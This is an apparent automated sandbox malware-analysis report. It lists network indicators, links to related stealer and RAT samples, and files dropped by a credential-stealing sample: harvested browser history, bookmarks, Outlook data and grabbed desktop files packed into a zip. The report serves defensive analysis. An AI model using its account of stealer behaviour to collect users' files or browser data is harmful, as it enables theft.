Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 52.165.164.15, 13.95.31.18, 40.69.42.241, 4.245.163.56, 20.109.210.53
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:02:22	API Interceptor	136x Sleep call for process: vEtDFkAZjO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	ip-api.com/json/?fields=61439
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	ip-api.com/json/
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	ip-api.com/json/?fields=61439
	987656789009800.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	Client-built.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	ip-api.com/json/?fields=225545
	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	ip-api.com/json/8.46.123.189?fields=192511

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
edge-block-www-env.dropbox-dns.com	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.15
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	hnghksdjfhs19De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	jhsdgfjkh236.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	kjhsdgGarmin17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	hngadsfkgj17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
ipbase.com	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.209.71
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	104.21.85.189
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.209.71
	ypauPrrA08.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	104.21.85.189
	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.21.85.189
	Nursultan.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWorm	Browse	104.21.85.189
	External.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	172.67.209.71
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	172.67.209.71
	Pots.exe	Get hash	malicious	44userber Stealer, Rags Stealer	Browse	104.21.85.189
	qdHMT36Tn9.exe	Get hash	malicious	44Caliber Stealer, Njrat, Rags Stealer	Browse	172.67.209.71
bg.microsoft.map.fastly.net	GYede3Gwn0.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	Qu3ped8inH.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	DIS_37745672.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	199.232.214.172
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	199.232.214.172
	222.msi	Get hash	malicious	XRed	Browse	199.232.214.172
	universityform.xlsm	Get hash	malicious	Unknown	Browse	199.232.210.172
	universityform.xlsm	Get hash	malicious	Unknown	Browse	199.232.210.172
	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	199.232.214.172
	SecuredOnedrive.ClientSetup.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
TUT-ASUS	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	208.95.112.1
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	987656789009800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	162.252.214.4
	Client-built.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	GYede3Gwn0.lnk	Get hash	malicious	Unknown	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	104.21.85.189 149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	719522
Entropy (8bit):	7.985087384624426
Encrypted:	false
SSDEEP:	12288:i2gSVQhbAGmSmIozGD4DuQSpUY6ZddqNZB1btjmGOjocohLzdBwfb2N4iJbwlBLR:i2nybpozG8UpUzZjqd7jmGRcoJLwzeBm
MD5:	636F3E18F4950F26898D227C8A5E5DDC
SHA1:	724D4C5F474CE6DBB25E5A71048F84B74CC0631D
SHA-256:	10A9EF11E6ABEE43C16F768F4DF738E3F659B901BC74AFCA5C30ECF74A15B834
SHA-512:	B58EF9709BDEF03BEE59D619EF9A16EAF9A9AC2574BB9D69AF9F07A750CCD50361129DDC66AA75521F66D22E980612423B33C104B0CF001C2D59E1B8EBA851DA
Malicious:	false
Reputation:	low
Preview:	PK..-.....NH.YK.............8.Information.txt............K......... .............[......[......[..p...........N.7LMC..Z....aU.K.....n.!_...'...\..:.A#[y....MG.1..'>..l...M ....}3r].<.{....k8........V...<..I.."..x..0.1n.@..sI.....-F....p.C......QB...Uq.?+[..4.3%.1.&...@H. $...Xj....q..3..U.......o.r.W-D.Q..roQB...e...f.J..<X..<>'.g..........F............h..y\|[3{k."ILoR..,..5d....K.i8%..83]....# ST.~..F..$.W.S.?.PK..-.....JH.Y`.S<..........8.InstalledSoftware.txt...................... ..........F@..[...F@..[...F@..[..8.w.z.AvK.i=.d...{.?.'5j".?..a...^.tJ....5...3..........G.#.....@^...#x.....j.B.O.....Tz.~f.s...n].......Gb.2...K....5Pbd.S.[..1.S..O.&y.g<....#.. .-y2.<..c.....u(..P]z..PK..-.....MH.Y.e............8.Process.txt.....G................ ..............[.......[...#...[..8.w.z.AvK.i.=...MC..v%p...lW'..+u..C[s[....e.+..jq?...l......`w.S.BN.&h..n.{&.....g+...l.7.@....[...V..zq.......7AQ..Hu.."...8.....j7..w..F_...@Q:....8C,l}N...C.....n.:.^A.7.9.

C:\Users\user\AppData\Local\138727\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\138727\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\138727\Browsers\Outlook\Outlook.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\138727\DotNetZip-u1bugrxr.tmp

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	719522
Entropy (8bit):	7.985087384624426
Encrypted:	false
SSDEEP:	12288:i2gSVQhbAGmSmIozGD4DuQSpUY6ZddqNZB1btjmGOjocohLzdBwfb2N4iJbwlBLR:i2nybpozG8UpUzZjqd7jmGRcoJLwzeBm
MD5:	636F3E18F4950F26898D227C8A5E5DDC
SHA1:	724D4C5F474CE6DBB25E5A71048F84B74CC0631D
SHA-256:	10A9EF11E6ABEE43C16F768F4DF738E3F659B901BC74AFCA5C30ECF74A15B834
SHA-512:	B58EF9709BDEF03BEE59D619EF9A16EAF9A9AC2574BB9D69AF9F07A750CCD50361129DDC66AA75521F66D22E980612423B33C104B0CF001C2D59E1B8EBA851DA
Malicious:	false
Reputation:	low
Preview:	PK..-.....NH.YK.............8.Information.txt............K......... .............[......[......[..p...........N.7LMC..Z....aU.K.....n.!_...'...\..:.A#[y....MG.1..'>..l...M ....}3r].<.{....k8........V...<..I.."..x..0.1n.@..sI.....-F....p.C......QB...Uq.?+[..4.3%.1.&...@H. $...Xj....q..3..U.......o.r.W-D.Q..roQB...e...f.J..<X..<>'.g..........F............h..y\|[3{k."ILoR..,..5d....K.i8%..83]....# ST.~..F..$.W.S.?.PK..-.....JH.Y`.S<..........8.InstalledSoftware.txt...................... ..........F@..[...F@..[...F@..[..8.w.z.AvK.i=.d...{.?.'5j".?..a...^.tJ....5...3..........G.#.....@^...#x.....j.B.O.....Tz.~f.s...n].......Gb.2...K....5Pbd.S.[..1.S..O.&y.g<....#.. .-y2.<..c.....u(..P]z..PK..-.....MH.Y.e............8.Process.txt.....G................ ..............[.......[...#...[..8.w.z.AvK.i.=...MC..v%p...lW'..+u..C[s[....e.+..jq?...l......`w.S.BN.&h..n.{&.....g+...l.7.@....[...V..zq.......7AQ..Hu.."...8.....j7..w..F_...@Q:....8C,l}N...C.....n.:.^A.7.9.

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
